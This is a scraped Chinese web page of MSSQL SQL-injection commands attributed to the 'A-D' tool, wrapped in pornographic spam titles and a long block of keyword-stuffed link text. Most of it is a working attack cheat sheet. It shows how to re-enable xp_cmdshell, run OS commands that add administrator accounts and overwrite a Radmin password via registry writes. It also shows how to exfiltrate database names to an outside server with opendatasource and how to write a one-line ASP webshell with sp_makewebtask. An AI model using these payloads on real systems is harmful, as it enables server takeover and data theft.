校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁(yè) > 知識(shí)庫(kù) > 阿D常用的一些注入命令整理小結(jié)

阿D常用的一些注入命令整理小結(jié)

熱門(mén)標(biāo)簽:交行外呼系統(tǒng)有哪些 怎么更改地圖標(biāo)注電話 防城港市ai電銷(xiāo)機(jī)器人 隨州銷(xiāo)售外呼系統(tǒng)平臺(tái) 寧夏保險(xiǎn)智能外呼系統(tǒng)哪家好 激戰(zhàn)黃昏地圖標(biāo)注說(shuō)明 溫嶺代理外呼系統(tǒng) 不同的地圖標(biāo)注 臨滄移動(dòng)外呼系統(tǒng)哪家有
//看看是什么權(quán)限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//檢測(cè)是否有讀取某數(shù)據(jù)庫(kù)的權(quán)限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


數(shù)字類(lèi)型
and char(124)%2Buser%2Bchar(124)=0

字符類(lèi)型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索類(lèi)型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用戶(hù)名
and user>0
' and user>0 and ''='

檢測(cè)是否為SA權(quán)限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

檢測(cè)是不是MSSQL數(shù)據(jù)庫(kù)
and exists (select * from sysobjects);--

檢測(cè)是否支持多行
;declare @d int;--

恢復(fù) xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
// 執(zhí)行命令
//-----------------------
首先開(kāi)啟沙盤(pán)模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb執(zhí)行系統(tǒng)命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

執(zhí)行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判斷xp_cmdshell擴(kuò)展存儲(chǔ)過(guò)程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

寫(xiě)注冊(cè)表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

讀注冊(cè)表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

讀取目錄內(nèi)容
exec master..xp_dirtree 'c:\winnt\system32\',1,1


數(shù)據(jù)庫(kù)備份
backup database pubs to disk = 'c:\123.bak'

//爆出長(zhǎng)度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--



更改sa口令方法:用sql綜合利用工具連接后,執(zhí)行命令:
exec sp_password NULL,'新密碼','sa'

添加和刪除一個(gè)SA權(quán)限的用戶(hù)test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

刪除擴(kuò)展存儲(chǔ)過(guò)過(guò)程xp_cmdshell的語(yǔ)句:
exec sp_dropextendedproc 'xp_cmdshell'

添加擴(kuò)展存儲(chǔ)過(guò)過(guò)程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public


停掉或激活某個(gè)服務(wù)。

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某個(gè)目錄下的子目錄。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

將目標(biāo)多個(gè)檔案壓縮到某個(gè)目標(biāo)檔案之內(nèi)。
所有要壓縮的檔案都可以接在參數(shù)列的最后方,以逗號(hào)隔開(kāi)。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

停掉某個(gè)執(zhí)行中的程序,但賦予的參數(shù)是 Process ID。
利用”工作管理員”,透過(guò)選單「檢視」-「選擇字段」勾選 pid,就可以看到每個(gè)執(zhí)行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解開(kāi)壓縮檔。

xp_unpackcab 'c:\test.cab','c:\temp',1


某機(jī),安裝了radmin,密碼被修改了,regedit.exe不知道被刪除了還是被改名了,net.exe不存在,沒(méi)有辦法使用regedit /e 導(dǎo)入注冊(cè)文件,但是mssql是sa權(quán)限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密碼為12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 則端口值改為1234

create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到數(shù)據(jù)庫(kù)名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases


//在Master中創(chuàng)建表,看看權(quán)限怎樣
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目錄里寫(xiě)入一句話?cǎi)R:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''%25execute(request("a"))%25>''%20';--

//更新表內(nèi)容
Update films SET kind = 'Dramatic' Where id = 123

//刪除內(nèi)容
delete from table_name where Stockid = 3

標(biāo)簽:忻州 哈密 無(wú)錫 紅河 河源 沈陽(yáng) 阜陽(yáng) 青海

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《阿D常用的一些注入命令整理小結(jié)》,本文關(guān)鍵詞  阿,常用的,常,用的,一些,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《阿D常用的一些注入命令整理小結(jié)》相關(guān)的同類(lèi)信息!
  • 本頁(yè)收集關(guān)于阿D常用的一些注入命令整理小結(jié)的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃
    亚洲成人av资源| 久久久久国产精品麻豆| 亚洲一区二区欧美日韩| 欧美无乱码久久久免费午夜一区| 综合久久国产九一剧情麻豆| 91成人看片片| 亚洲一二三区在线观看| 欧美精品乱码久久久久久 | 精品久久人人做人人爽| 久久精品理论片| 久久久噜噜噜久久人人看| 成人黄色软件下载| 亚洲精品国产第一综合99久久| 欧美在线小视频| 蜜桃久久精品一区二区| 久久蜜桃av一区二区天堂| jiyouzz国产精品久久| 亚洲线精品一区二区三区八戒| 欧美喷潮久久久xxxxx| 精品无码三级在线观看视频| 国产精品欧美久久久久无广告| 色www精品视频在线观看| 美女视频一区二区三区| 国产精品入口麻豆九色| 欧美中文一区二区三区| 国产一区高清在线| 洋洋av久久久久久久一区| 日韩精品一区二区三区四区| 成人h精品动漫一区二区三区| 亚洲高清免费视频| 国产欧美一区二区精品秋霞影院| 91福利精品第一导航| 久久精品国产99久久6| 亚洲区小说区图片区qvod| 日韩欧美一级精品久久| 一本色道久久综合精品竹菊| 久久国内精品视频| 亚洲乱码日产精品bd| 制服丝袜在线91| 国产成人午夜高潮毛片| 亚洲视频在线一区| 欧美一级在线观看| 精品亚洲免费视频| 国产精品福利一区二区| 欧美性色综合网| 国产精品影视天天线| 亚洲乱码中文字幕综合| 日韩欧美不卡在线观看视频| 成人精品小蝌蚪| 日韩精品电影一区亚洲| 精品成人一区二区三区| 在线影院国内精品| 精品一区二区三区免费播放| 一区二区三区日韩欧美精品| 精品国产三级电影在线观看| 91在线观看污| 国产在线播精品第三| 一区二区在线电影| 欧美裸体一区二区三区| 久久99久久99小草精品免视看| 亚洲欧美韩国综合色| 久久免费偷拍视频| 欧美久久久久中文字幕| av在线不卡免费看| 国产综合色视频| 天堂午夜影视日韩欧美一区二区| 国产精品毛片久久久久久| 日韩视频永久免费| 欧美日韩精品一区二区| av午夜精品一区二区三区| 精品午夜一区二区三区在线观看| 国产精品全国免费观看高清 | 欧美日韩综合不卡| 国产成人在线观看免费网站| 丝袜脚交一区二区| 亚洲综合色视频| 国产精品久久久久一区| 欧美精品一区二区久久婷婷| 欧美喷水一区二区| 欧美日韩在线一区二区| 国产suv一区二区三区88区| 久久成人精品无人区| 蜜桃精品视频在线观看| 午夜激情一区二区三区| 一区二区久久久久久| 亚洲图片欧美激情| 自拍偷拍亚洲欧美日韩| 国产精品网站在线播放| 国产欧美精品一区二区三区四区| 精品国产凹凸成av人网站| 日韩三级伦理片妻子的秘密按摩| 欧美二区三区的天堂| 一本一道久久a久久精品综合蜜臀| 成人免费福利片| 成人免费毛片app| 成人av资源站| 91亚洲精品久久久蜜桃| 97久久超碰国产精品电影| 北岛玲一区二区三区四区| 懂色av一区二区三区蜜臀| 国产福利不卡视频| 成人激情动漫在线观看| 成人免费高清在线观看| www.99精品| 在线亚洲精品福利网址导航| 不卡一区在线观看| 在线免费不卡视频| 91精品国产91久久久久久一区二区 | 欧美在线观看视频一区二区 | 日本午夜一区二区| 国产精品久久久久久久久动漫| 久久久久综合网| 伊人夜夜躁av伊人久久| 亚洲福利电影网| 美女看a上一区| 韩国精品久久久| 99久久777色| 7777精品伊人久久久大香线蕉 | 一区二区三区在线观看动漫| 一区二区三区精品在线| 亚洲一区影音先锋| 日产国产欧美视频一区精品| 亚洲一二三四久久| 午夜欧美电影在线观看| 美女网站一区二区| 国产不卡在线播放| 欧美色综合影院| 精品成a人在线观看| 亚洲欧洲美洲综合色网| 香蕉成人伊视频在线观看| 麻豆国产一区二区| 99精品视频在线播放观看| 欧美区视频在线观看| 国产性色一区二区| 亚洲一区二区三区美女| 国内久久精品视频| 成人app软件下载大全免费| 91精品国产综合久久久久| 久久久国产精品不卡| 一区二区日韩电影| 狠狠狠色丁香婷婷综合激情| 99久精品国产| 精品国产区一区| 伊人婷婷欧美激情| 国产精品一二一区| 欧美精品久久99久久在免费线 | 欧美在线视频不卡| 久久久不卡网国产精品二区| 亚洲国产精品一区二区久久| 丁香天五香天堂综合| 日韩一区二区三区四区| 亚洲欧美另类久久久精品2019| 九一久久久久久| 欧美精品视频www在线观看| 国产精品色在线观看| 麻豆高清免费国产一区| 成人听书哪个软件好| 日本道色综合久久| 国产日韩v精品一区二区| 日韩精品91亚洲二区在线观看| 91丝袜呻吟高潮美腿白嫩在线观看| 欧美一区二区精品久久911| 一区二区三区日韩欧美精品| 丁香激情综合五月| 久久婷婷久久一区二区三区| 日韩黄色小视频| 欧美综合一区二区三区| 国产精品久久夜| 国产精品911| 精品美女在线播放| 麻豆精品一区二区av白丝在线| 欧美伊人久久久久久久久影院| 国产精品视频一区二区三区不卡| 韩国视频一区二区| 精品久久人人做人人爱| 蜜臀av性久久久久蜜臀aⅴ四虎| 欧美日本一区二区在线观看| 伊人色综合久久天天人手人婷| 国产成人av电影在线播放| 国产午夜精品一区二区三区嫩草 | 亚洲影院理伦片| 91蜜桃网址入口| 亚洲你懂的在线视频| jlzzjlzz亚洲日本少妇| 中文字幕一区二区日韩精品绯色| 日本亚洲电影天堂| 欧美一二三四在线| 久久99精品国产麻豆不卡| 久久蜜桃香蕉精品一区二区三区| 精品一区二区三区久久| 久久午夜电影网| 狠狠色丁香九九婷婷综合五月| 精品欧美一区二区在线观看| 欧美96一区二区免费视频| 欧美成人官网二区| 国产一区二区三区久久悠悠色av| 久久色成人在线| 99麻豆久久久国产精品免费| 亚洲免费伊人电影| 欧美视频一区二区三区四区|